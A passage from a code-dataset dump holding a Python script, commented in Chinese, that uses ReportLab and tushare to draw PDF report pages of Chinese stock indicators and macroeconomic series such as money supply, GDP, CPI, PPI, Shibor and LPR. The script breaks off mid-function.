export_url\n","repo_name":"apptension/saas-boilerplate","sub_path":"packages/workers/userauth/tests/test_services.py","file_name":"test_services.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":1208,"dataset":"github-code","pt":"36"} +{"seq_id":"32143238057","text":"# encoding = utf-8\n\nfrom SDK.SDKHeader import *\nimport random\nfrom General.GlobalSetting import stk_basic\nimport pandas as pd\nimport numpy as np\nfrom reportlab.graphics.charts.barcharts import VerticalBarChart\nfrom reportlab.graphics.charts.legends import Legend\n\nfrom reportlab.lib.pagesizes import letter\n\nfrom reportlab.platypus import *\nfrom reportlab.lib.styles import getSampleStyleSheet\n\n# 画图相关\nfrom reportlab.graphics.shapes import Drawing, PolyLine, colors, Auto\nfrom reportlab.graphics import renderPDF\nfrom reportlab.graphics.charts.lineplots import LinePlot\nfrom reportlab.graphics.widgets.markers import makeMarker\nfrom reportlab.pdfbase.pdfmetrics import stringWidth\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.pdfbase import pdfmetrics\n\npdfmetrics.registerFont(TTFont('song', 'SURSONG.TTF'))\npdfmetrics.registerFont(TTFont('hei', 'SIMHEI.TTF'))\n\nfrom reportlab.lib import fonts\nfonts.addMapping('song', 0, 0, 'song')\nfonts.addMapping('song', 0, 1, 'song')\nfonts.addMapping('song', 1, 0, 'hei')\nfonts.addMapping('song', 1, 1, 'hei')\n\n\ndef addFront(canvas_param, theme, subtitle, pagesize=letter):\n \"\"\"\n 函数功能:为pdf文档添加功能,分“主题”、“副标题”两部分\n :param canvas:\n :param pagesize: 页面大小,默认A4\n :param theme: 主题字符串\n :param subtitle: 副标题字符串\n :return:\n \"\"\"\n PAGE_WIDTH = pagesize[0]\n PAGE_HEIGHT = pagesize[1]\n\n # 设置主标题字体并打印主标题\n canvas_param.setFont(\"song\", 30)\n canvas_param.drawString((PAGE_WIDTH-stringWidth(theme, fontName='song', fontSize=30))/2.0, PAGE_HEIGHT*0.618, theme)\n\n # 设置副标题字体并打印副标题\n canvas_param.setFont(\"song\", 10)\n canvas_param.drawString((PAGE_WIDTH-stringWidth(theme, fontName='song', fontSize=30))/2.0, PAGE_HEIGHT*0.15, subtitle)\n\n canvas_param.showPage()\n\n return canvas_param\n\n\ndef add_legend(draw_obj, chart, pos_x, pos_y):\n\n \"\"\"\n 函数功能:voltGroupDisplayByBar函数的子函数\n :param draw_obj:\n :param chart:\n :return:\n \"\"\"\n legend = Legend()\n legend.alignment = 'right'\n legend.fontName = 'song'\n legend.columnMaximum = 2\n legend.x = pos_x\n legend.y = pos_y\n legend.colorNamePairs = Auto(obj=chart)\n draw_obj.add(legend)\n\n\ndef ExtractPointFromDf_DateX(df_origin, date_col, y_col, timeAxis='day'):\n\n \"\"\"\n 函数功能:从一个dataframe中提取两列,组成point列表格式,以供ReportLab画图之用\n 同时将日期中的时间提取出来,转为秒。\n\n 本函数主要用来画当日数据!因为将datetime中的date去掉了,只保留time。\n\n :param df_origin:\n :param x_col:\n :param y_col:\n :return:\n \"\"\"\n\n # 将“data”列中的数据解析后,作为新的列增加到df中\n # df_origin = ExtractJsonToColum(df_row=df_origin, col='data')\n # if len(df_origin) == 0:\n # return []\n\n # 按时间排序,并删除空值\n df_origin = df_origin.sort_values(by=date_col, ascending=True)\n df_origin = df_origin[True - df_origin[y_col].isnull()]\n\n # if len(df_origin) == 0:\n # print('函数 ExtractPointFromDf_DateX:删除空值后,dataframe为空!入参df中不含指定列')\n # return df_origin\n\n # 提取时间,并将时间转为秒\n if timeAxis == 'day':\n df_origin['time'] = df_origin.apply(lambda x: DateStr2Sec(str(x[date_col])), axis=1)\n\n elif timeAxis == 'datetime':\n df_origin['time'] = df_origin.apply(lambda x: DatetimeStr2Sec(str(x[date_col])), axis=1)\n\n elif timeAxis == 'quarter':\n df_origin['time'] = df_origin.apply(lambda x: convertQuarter2Value(str(x[date_col])), axis=1)\n\n elif timeAxis == 'year':\n df_origin['time'] = df_origin.apply(lambda x: x[date_col], axis=1)\n\n elif timeAxis == 'month':\n df_origin['time'] = df_origin.apply(lambda x:DateStr2Sec(stdMonthDate2ISO(str(x[date_col]))),axis=1)\n\n # 单独取出相应两列,准备转成point格式\n df_part = df_origin.loc[:, ['time', y_col]]\n\n # 将df转为array\n point_array = list(map(lambda x: (x[0], float(x[1])), df_part.values))\n\n return point_array\n\n\ndef addAcTemp(canvas_param, opc_df_today,pos_x, pos_y, width, height):\n\n total_df = opc_df_today\n\n # 取出\n # “室外天气”、\n # “冷却侧供水温度”、\n # “冷却侧回水温度”、\n # “冷冻侧供水温度”、\n # “冷冻侧回水温度”\n total_df_OAT = total_df[total_df.browse_name == 'OA-T']\n\n total_df_CSSWT = total_df[total_df.browse_name == 'CS-SWT']\n total_df_CSRWT = total_df[total_df.browse_name == 'CS-RWT']\n\n total_df_FSSWT = total_df[total_df.browse_name == 'FS-SWT']\n total_df_FSRWT = total_df[total_df.browse_name == 'FS-RWT']\n\n # 生成5个变量相应的点阵\n data_OAT = ExtractPointFromDf_DateX(df_origin=total_df_OAT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n\n data_CSSWT = ExtractPointFromDf_DateX(df_origin=total_df_CSSWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n data_CSRWT = ExtractPointFromDf_DateX(df_origin=total_df_CSRWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n\n data_FSSWT = ExtractPointFromDf_DateX(df_origin=total_df_FSSWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n data_FSRWT = ExtractPointFromDf_DateX(df_origin=total_df_FSRWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n\n data_origin = [tuple(data_OAT), tuple(data_CSSWT), tuple(data_CSRWT), tuple(data_FSSWT), tuple(data_FSRWT)]\n\n # 定义各曲线标签\n data_name_origin = ['室外温度', '冷却侧供水温度', '冷却侧回水温度', '冷冻侧供水温度', '冷冻侧回水温度']\n\n # 处理某条线没有数据的情况,若不处理“没有数据”的情况,画线的时候会报错!\n data = []\n data_name = []\n\n for i in range(0, len(data_origin)):\n if len(data_origin[i]) != 0:\n data.append(data_origin[i])\n data_name.append(data_name_origin[i])\n\n if len(data) == 0:\n print('函数 addAcTemp:原始df解析后没有想要���温度数据!')\n return canvas_param\n\n c = canvas_param\n # c.setFont(\"song\", 10)\n\n drawing = Drawing(width=width, height=height)\n\n lp = LinePlot()\n # lp.x = 50\n # lp.y = 50\n lp.height = height\n lp.width = width\n lp.data = data\n lp.joinedLines = 1\n\n # 定义各曲线颜色\n lp.lines[0].strokeColor = colors.blue\n lp.lines[1].strokeColor = colors.red\n lp.lines[2].strokeColor = colors.lightgreen\n lp.lines[3].strokeColor = colors.orange\n lp.lines[4].strokeColor = colors.darkgreen\n\n for i in range(0, len(data)):\n lp.lines[i].name = data_name[i]\n lp.lines[i].symbol = makeMarker('FilledCircle', size=0.5)\n lp.lines[i].strokeWidth = 0.2\n\n # lp.lineLabelFormat = '%2.0f'\n # lp.strokeColor = colors.black\n\n lp.xValueAxis.valueMin = 0\n lp.xValueAxis.valueMax = 60*60*24\n lp.xValueAxis.valueSteps = [n for n in range(0, 60*60*24, 60*60)]\n lp.xValueAxis.labelTextFormat = lambda x: str(s2t(x))[0:2]\n lp.yValueAxis.valueMin = 0\n # lp.yValueAxis.valueMax = 50\n # lp.yValueAxis.valueSteps = [1, 2, 3, 5, 6]\n drawing.add(lp)\n add_legend(draw_obj=drawing, chart=lp, pos_x=10, pos_y=-10)\n\n renderPDF.draw(drawing=drawing, canvas=c, x=pos_x, y=pos_y)\n\n\ndef genLPDrawing(data, data_note, width=letter[0]*0.8, height=letter[1]*0.25, timeAxis='day', y_min_zero=False):\n \"\"\"\n 函数功能:生成Drawing之用\n :return:\n \"\"\"\n\n drawing = Drawing(width=width, height=height)\n\n lp = LinePlot()\n # lp.x = 50\n # lp.y = 50\n lp.height = height\n lp.width = width\n lp.data = data\n lp.joinedLines = 1\n\n # 定义颜色集\n barFillColors = [\n colors.red, colors.green, colors.blue, colors.darkgoldenrod,\n colors.pink, colors.purple, colors.lightgreen, colors.darkblue, colors.lightyellow,\n colors.fidred, colors.greenyellow, colors.gray, colors.white,colors.blueviolet, colors.lightgoldenrodyellow]\n\n for i in range(0, len(data)):\n lp.lines[i].name = data_note[i]\n lp.lines[i].symbol = makeMarker('FilledCircle', size=0.5)\n lp.lines[i].strokeWidth = 0.2\n lp.lines[i].strokeColor = barFillColors[i]\n\n # lp.lineLabelFormat = '%2.0f'\n # lp.strokeColor = colors.black\n\n x_min = data[0][0][0]\n x_max = data[0][-1][0]\n\n lp.xValueAxis.valueMin = x_min\n lp.xValueAxis.valueMax = x_max\n\n if timeAxis=='day':\n step = int(((x_max - x_min) / (60 * 60 * 24)) / 30) + 1\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), 60 * 60 * 24 * step)]\n lp.xValueAxis.labelTextFormat = lambda x: str(Sec2Datetime(x)[0:10])\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n # lp.yValueAxis.valueMax = 50\n # lp.yValueAxis.valueSteps = [1, 2, 3, 5, 6]\n\n elif timeAxis=='quarter':\n\n step = int(((x_max - x_min)/0.25) / 30) + 1\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), int(math.ceil(0.25 * step)))]\n lp.xValueAxis.labelTextFormat = lambda x: convertValue2Quarter(x)\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n elif timeAxis=='year':\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), 1)]\n lp.xValueAxis.labelTextFormat = lambda x: str(x)\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n elif timeAxis=='month':\n\n lp.xValueAxis.valueSteps = list(map(lambda x:x[0],data[0]))\n lp.xValueAxis.labelTextFormat = lambda x: str(Sec2Datetime(x))[0:7]\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n drawing.add(lp)\n add_legend(draw_obj=drawing, chart=lp, pos_x=10, pos_y=-20)\n\n return drawing\n\n\ndef genBarDrawing(data, data_note, width=letter[0]*0.8, height=letter[1]*0.25):\n \"\"\"\n 函数功能:生成Drawing之用\n :return:\n \"\"\"\n data_value = list(map(lambda x:x[1],data))\n\n data_finale = [tuple(data_value)]\n\n drawing = Drawing(width=width, height=height)\n\n\n bc = VerticalBarChart()\n\n # bc.x = 50\n # bc.y = 50\n # bc.height = 125\n bc.width = width\n bc.data = data_finale\n # bc.valueAxis.valueMin = 0\n bc.barSpacing = 0\n\n # bc.valueAxis.valueMax = 50\n # bc.valueAxis.valueStep = 10\n # bc.categoryAxis.style = 'stacked'\n bc.categoryAxis.labels.boxAnchor = 'ne'\n bc.categoryAxis.labels.dx = 8\n bc.categoryAxis.labels.dy = -2\n bc.categoryAxis.labels.angle = 30\n\n barFillColors = [\n colors.red, colors.green, colors.white, colors.blue, colors.yellow,\n colors.pink, colors.purple, colors.lightgreen, colors.darkblue, colors.lightyellow,\n colors.fidred, colors.greenyellow, colors.gray, colors.blueviolet, colors.lightgoldenrodyellow]\n\n for i in range(len(data_finale)):\n bc.bars[i].name = data_note[i]\n\n # 最多只支持15种颜色,多出的设置为红色\n if i < 15:\n bc.bars[i].fillColor = barFillColors[i]\n else:\n bc.bars[i].fillColor = colors.red\n\n # x_min = data[0][0]\n # x_max = data[-1][0]\n\n # bc.xValueAxis.valueMin = x_min\n # lp.xValueAxis.valueMax = x_max\n\n # step = int(((x_max - x_min) / (60 * 60 * 24)) / 15) + 1\n\n # bc.categoryAxis.categoryNames = [str(Sec2Datetime(x))[0:10] for x in range(int(x_min), int(x_max), 60 * 60 * 24 * step)]\n\n drawing.add(bc)\n\n # 增加legend\n # add_legend(drawing, bc, pos_x=10, pos_y=-10)\n\n return drawing\n\n\ndef RPL_Bk_Page(canvas_para,bk_name):\n \"\"\"\n 函数功能:在pdf中增加bk信息,篇幅为一整页,或者更多,以页为单位\n :param bk_name:\n :param days: 用于指示近期的期限,比如近30天\n :return:\n \"\"\"\n\n\n # 插入字符串,用以表明stk代码及名称\n canvas_para.setFont(\"song\", 10)\n if bk_name in ['sh','sz','cyb']:\n stk_name = bk_name\n\n else:\n stk_name = stk_basic[stk_basic.index==bk_name]['name'].values[0]\n\n canvas_para.drawString(20, letter[1] - 10, bk_name + stk_name)\n\n\n\n sh_index = ts.get_hist_data(bk_name)\n sh_index['date'] = sh_index.index\n sh_index = sh_index.reset_index(drop=True)\n\n\n # 按时间降序排序,方便计算macd\n sh_index = sh_index.sort_values(by='date',ascending=True)\n\n # 在原始df中增加macd信息\n sh_index['MACD'],sh_index['MACDsignal'],sh_index['MACDhist'] = talib.MACD(sh_index.close,\n fastperiod=12, slowperiod=26, signalperiod=9)\n\n # 在原始数据中增加kdj信息\n sh_index['slowk'], sh_index['slowd'] = talib.STOCH(sh_index.high,\n sh_index.low,\n sh_index.close,\n fastk_period=9,\n slowk_period=3,\n slowk_matype=0,\n slowd_period=3,\n slowd_matype=0)\n\n\n # 添加rsi信息\n sh_index['RSI5'] = talib.RSI(sh_index.close, timeperiod=5)\n sh_index['RSI12'] = talib.RSI(sh_index.close, timeperiod=12)\n sh_index['RSI30'] = talib.RSI(sh_index.close, timeperiod=30)\n\n\n # 在原始数据中加入布林线\n sh_index['upper'], sh_index['middle'], sh_index['lower'] = talib.BBANDS(\n sh_index.close,\n timeperiod=20,\n # number of non-biased standard deviations from the mean\n nbdevup=2,\n nbdevdn=2,\n # Moving average type: simple moving average here\n matype=0)\n\n\n sh_index = sh_index.dropna(axis=0,how='any')\n\n close = ExtractPointFromDf_DateX(sh_index, 'date', 'close')\n m5 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma5')\n m10 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma10')\n m20 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma20')\n\n macd = ExtractPointFromDf_DateX(sh_index, 'date', 'MACD')\n\n data = [tuple(close),tuple(m5),tuple(m10),tuple(m20)]\n data_name = ['close','m5','m10','m20']\n\n drawing_ave = genLPDrawing(data=data, data_note=data_name,height=letter[1]*0.15)\n renderPDF.draw(drawing=drawing_ave, canvas=canvas_para, x=10, y=letter[1] * 0.8)\n\n drawing_macd = genBarDrawing(data=macd, data_note=['macd'])\n renderPDF.draw(drawing=drawing_macd, canvas=canvas_para, x=10, y=letter[1]*0.6)\n\n\n # 整理kdj信息\n slowk = ExtractPointFromDf_DateX(sh_index, 'date', 'slowk')\n slowd = ExtractPointFromDf_DateX(sh_index, 'date', 'slowd')\n data_kdj = [tuple(slowk),tuple(slowd)]\n data_kdj_note = ['k','d']\n\n drawing_kdj = genLPDrawing(data=data_kdj, data_note=data_kdj_note,height=letter[1]*0.1)\n renderPDF.draw(drawing=drawing_kdj, canvas=canvas_para, x=10, y=letter[1] * 0.5)\n\n # 画图RSI信息\n RSI5 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI5')\n RSI12 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI12')\n RSI30 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI30')\n\n data_RSI = [tuple(RSI5),tuple(RSI12),tuple(RSI30)]\n data_RSI_note = ['RSI5','RSI12','RSI30']\n\n drawing_RSI = genLPDrawing(data=data_RSI, data_note=data_RSI_note,height=letter[1]*0.1)\n renderPDF.draw(drawing=drawing_RSI, canvas=canvas_para, x=10, y=letter[1] * 0.3)\n\n\n # 画图布林线\n upper = ExtractPointFromDf_DateX(sh_index, 'date', 'upper')\n middle = ExtractPointFromDf_DateX(sh_index, 'date', 'middle')\n lower = ExtractPointFromDf_DateX(sh_index, 'date', 'lower')\n\n data_BOLL = [tuple(upper),tuple(middle),tuple(lower)]\n data_BOLL_note = ['上线','中线','下线']\n\n drawing_BOLL = genLPDrawing(data=data_BOLL, data_note=data_BOLL_note,height=letter[1]*0.1)\n renderPDF.draw(drawing=drawing_BOLL, canvas=canvas_para, x=10, y=letter[1] * 0.1)\n\n canvas_para.showPage()\n\n return canvas_para\n\n\ndef addMoneySupplyPage(canvas_para):\n \"\"\"\n 函数功能:在pdf中增加货币供应页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n c.setFont(\"song\", 10)\n c.drawString(10, letter[1] - 20, '货币供应')\n c.setLineWidth(3)\n c.line(10, letter[1] - 24, letter[0] - 10, letter[1] - 24)\n\n\n # 画货币供应量\n money_supply = ts.get_money_supply().replace('--',nan)\n money_supply['date'] = money_supply.apply(lambda x: stdMonthDate2ISO(x['month']), axis=1)\n\n # 画货币量曲线图\n m0 = ExtractPointFromDf_DateX(money_supply, 'date', 'm0')\n m1 = ExtractPointFromDf_DateX(money_supply, 'date', 'm1')\n m2 = ExtractPointFromDf_DateX(money_supply, 'date', 'm2')\n\n data_supply = [tuple(m0), tuple(m1), tuple(m2)]\n data_supply_note = ['m0', 'm1', 'm2']\n\n money_drawing = genLPDrawing(data=data_supply, data_note=data_supply_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n # 画货币量增长率曲线图\n m0_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm0_yoy')\n m1_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm1_yoy')\n m2_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm2_yoy')\n\n data_supply_yoy = [tuple(m0_yoy), tuple(m1_yoy), tuple(m2_yoy)]\n data_supply_yoy_note = ['m0增长率', 'm1增长率', 'm2增长率']\n\n money_yoy_drawing = genLPDrawing(data=data_supply_yoy, data_note=data_supply_yoy_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_yoy_drawing, canvas=c, x=10, y=letter[1] * 0.4)\n\n c.showPage()\n\n return c\n\n\ndef addReserveBaseRatePage(canvas_para):\n \"\"\"\n 函数功能:在pdf中增加准备金基率\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n c.setFont(\"song\", 10)\n c.drawString(10, letter[1] - 20, '存款准备金基率')\n c.setLineWidth(3)\n c.line(10, letter[1] - 24, letter[0] - 10, letter[1] - 24)\n\n # 画银行准备金基率\n df_rbr = ts.get_rrr().replace('--', nan)\n # df_rbr['date'] = df_rbr.apply(lambda x: stdMonthDate2ISO(x['month']), axis=1)\n\n # 提取相关数据\n pot_before = ExtractPointFromDf_DateX(df_rbr, 'date', 'before')\n pot_now = ExtractPointFromDf_DateX(df_rbr, 'date', 'now')\n pot_changed = ExtractPointFromDf_DateX(df_rbr, 'date', 'changed')\n\n data_rbr = [tuple(pot_now)]\n data_rbr_note = ['准备金基率']\n\n money_drawing = genLPDrawing(data=data_rbr, data_note=data_rbr_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n c.showPage()\n\n return c\n\n\ndef addQuarterGDPPage(canvas_para):\n\n \"\"\"\n 函数功能:增加季度GDP页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n gdp_quarter = ts.get_gdp_quarter()\n\n gdp_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='gdp_yoy', timeAxis='quarter')\n pi_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='pi_yoy', timeAxis='quarter')\n si_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='si_yoy', timeAxis='quarter')\n\n ti_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='ti_yoy', timeAxis='quarter')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(gdp_yoy),tuple(pi_yoy),tuple(si_yoy),tuple(ti_yoy)],\n data_note=['GDP同比增长率','第一产业增长率','第二产业增长率','第三产业增长率'],\n timeAxis='quarter')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addDemandsForGDPPage(canvas_para):\n\n \"\"\"\n 函数功能:三大需求对GDP的贡献\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n gdp_for = ts.get_gdp_for()\n\n end_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='end_for', timeAxis='year')\n asset_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='asset_for', timeAxis='year')\n goods_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='goods_for', timeAxis='year')\n\n\n gdp_for_drawing = genLPDrawing([tuple(end_for), tuple(asset_for), tuple(goods_for)], ['最终消费支出贡献率', '资本形成总额贡献率', '货物和服务净出口贡献率'], timeAxis='year')\n\n renderPDF.draw(drawing=gdp_for_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n for_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='for_rate', timeAxis='year')\n asset_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='asset_rate', timeAxis='year')\n goods_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='goods_rate', timeAxis='year')\n\n\n gdp_for_drawing = genLPDrawing([tuple(for_rate), tuple(asset_rate), tuple(goods_rate)], ['最终消费支出拉动(百分点)', '资本形成总额拉动(百分点)', '货物和服务净出口拉动(百分点)'], timeAxis='year')\n\n renderPDF.draw(drawing=gdp_for_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n c.showPage()\n\n return c\n\n\ndef addGDPPullPage(canvas_para):\n\n \"\"\"\n 函数功能:展示三个产业对GDP的拉动情况\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n gdp_pull = ts.get_gdp_pull()\n\n gdp_yoy = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='gdp_yoy', timeAxis='year')\n pi = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='pi', timeAxis='year')\n si = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='si', timeAxis='year')\n industry = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='industry', timeAxis='year')\n ti = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='ti', timeAxis='year')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(gdp_yoy),tuple(pi),tuple(si),tuple(industry),tuple(ti)],\n data_note=['GDP同比增长率','第一产业拉动率','第二产业拉动率','工业拉动率','第三产业拉动率'],\n timeAxis='year')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addCPIPage(canvas_para, length):\n \"\"\"\n 函数功能:增加CPI页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n cpi_df = ts.get_cpi()\n cpi_df['month'] = cpi_df.apply(lambda x:stdMonthDate(x['month']), axis=1)\n cpi_df = cpi_df.sort_values(by='month',ascending=False).head(length).sort_values(by='month',ascending=True)\n\n cpi = ExtractPointFromDf_DateX(df_origin=cpi_df, date_col='month', y_col='cpi', timeAxis='month')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(cpi)],\n data_note=['CPI增长率'],\n timeAxis='month')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addPPIPage(canvas_para, length):\n \"\"\"\n 函数功能:工业品出厂价格指数\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n ppi_df = ts.get_ppi()\n ppi_df['month'] = ppi_df.apply(lambda x:stdMonthDate(x['month']), axis=1)\n ppi_df = ppi_df.sort_values(by='month',ascending=False).head(length).sort_values(by='month',ascending=True)\n\n ppiip = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='ppiip', timeAxis='month')\n ppi = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='ppi', timeAxis='month')\n qm = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='qm', timeAxis='month')\n rmi = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='rmi', timeAxis='month')\n pi = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='pi', timeAxis='month')\n\n\n ppi_industry_drawing = genLPDrawing([tuple(ppiip), tuple(ppi), tuple(qm), tuple(rmi), tuple(pi)],\n data_note=['工业品出厂价格指数',\n '生产资料价格指数',\n '采掘工业价格指数',\n '原材料工业价格指数',\n '加工工业价格指数'],\n timeAxis='month')\n\n renderPDF.draw(drawing=ppi_industry_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n cg = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='cg', timeAxis='month')\n food = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='food', timeAxis='month')\n clothing = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='clothing', timeAxis='month')\n roeu = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='roeu', timeAxis='month')\n dcg = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='dcg', timeAxis='month')\n\n\n ppi_life_drawing = genLPDrawing([tuple(cg), tuple(food), tuple(clothing), tuple(roeu), tuple(dcg)],\n data_note=['生活资料价格指数',\n '食品类价格指数',\n '衣着类价格指数',\n '一���日用品价格指数',\n '耐用消费品价格指数'],\n timeAxis='month')\n\n renderPDF.draw(drawing=ppi_life_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n c.showPage()\n\n return c\n\n\ndef addShiborPage(canvas_para,year_start='2006',year_end=str(datetime.datetime.now().year + 1)):\n \"\"\"\n 函数功能:增加银行间拆借利率页\n :param canvas_para:\n :return:\n \"\"\"\n c = canvas_para\n\n date_list = pd.date_range(start=year_start, end=year_end, freq='12M')\n year_list = [str(x)[0:4] for x in date_list]\n\n df_shibor_list = []\n for year in year_list:\n shibor_this = ts.shibor_data(year)\n df_shibor_list.append(shibor_this)\n\n df_shibor = pd.concat(df_shibor_list,axis=0).sort_values(by='date', ascending=True)\n\n ON = ExtractPointFromDf_DateX(df_origin=df_shibor,date_col='date',y_col='ON',timeAxis='datetime')\n W1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1W',timeAxis='datetime')\n W2 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='2W',timeAxis='datetime')\n M1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1M',timeAxis='datetime')\n M3 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='3M',timeAxis='datetime')\n M6 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='6M',timeAxis='datetime')\n M9 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='9M',timeAxis='datetime')\n Y1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1Y',timeAxis='datetime')\n\n shibor_drawing = genLPDrawing([tuple(ON)],data_note=['隔夜拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.85)\n\n shibor_drawing = genLPDrawing([tuple(W1)],data_note=['1周拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n shibor_drawing = genLPDrawing([tuple(W2)],data_note=['2周拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.55)\n\n shibor_drawing = genLPDrawing([tuple(M1)],data_note=['1月拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.4)\n\n shibor_drawing = genLPDrawing([tuple(M3),\n tuple(M6),\n tuple(M9),\n tuple(Y1)],\n\n data_note=['3月拆放利率',\n '6月拆放利率',\n '9月拆放利率',\n '1年拆放利率'],\n\n timeAxis='day',height=letter[1]*0.25)\n\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.1)\n\n c.showPage()\n return c\n\n\ndef addLprPage(canvas_para,year_start='2013',year_end=str(datetime.datetime.now().year + 1)):\n \"\"\"\n 函数功能:增加贷款利率页\n :param canvas_para:\n :return:\n \"\"\"\n c = canvas_para\n\n date_list = pd.date_range(start=year_start, end=year_end, freq='12M')\n year_list = [str(x)[0:4] for x in date_list]\n\n df_Lpr_list = []\n for year in year_list:\n lpr_this = ts.lpr_data(year)\n df_Lpr_list.append(lpr_this)\n\n df_Lpr = pd.concat(df_Lpr_list, axis=0).sort_values(by='date', ascending=True).drop_duplicates(subset='1Y',keep='first')\n\n Y1 = ExtractPointFromDf_DateX(df_origin=df_Lpr, date_col='date', y_col='1Y', timeAxis='datetime')\n lpr_drawing = genLPDrawing([tuple(Y1)], data_note=['1年贷款基础利率'], timeAxis='day', height=letter[1] * 0.3, y_min_zero=True)\n 